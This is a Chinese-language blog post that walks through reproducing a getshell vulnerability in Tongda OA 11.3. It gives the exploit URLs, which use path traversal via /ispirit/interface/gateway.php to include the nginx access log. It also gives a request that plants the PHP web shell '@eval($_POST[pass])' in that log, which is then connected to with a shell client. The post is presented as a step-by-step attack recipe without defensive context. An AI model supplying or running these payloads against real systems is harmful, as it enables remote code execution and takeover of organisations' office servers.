通达 OA 的 getshell 漏洞复现

准备漏洞环境:

我使用的是从官网下载的最新版

本机:Windows10+Cknife 连接 shell

漏洞环境:通达 OA11.3 版服务端(2020-01-03 12:50)

开始复现

1、开始安装环境,一步步的傻瓜式安装,然后启动环境

通达 OA 的 getshell 漏洞复现

2、然后拿出我们的 POC

/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.acces s.log

3、我们需要二步操作第一步:打开

第一步:打开

youdomain+/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/ oa.access.log,看能否显示出来日志

通达 OA 的 getshell 漏洞复现

成功为此

第二步: 抓包写一句话, POC : youdomain+/ispirit/interface/gateway.php?<?php @eval($_POST[pass]);?>(gateway.php?之后的一句话可任意写入替换),成功即为下图

通达 OA 的 getshell 漏洞复现

4、连接一句话,拿下 shell

(shell 默 认 地 址 : youdomain+/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/ oa.access.log)

通达 OA 的 getshell 漏洞复现

原创文章,作者:霜天,如若转载,请注明出处:https://www.i5seo.com/tong-da-oa-de-getshell-lou-dong-fu-xian.html

发表评论

登录后才能评论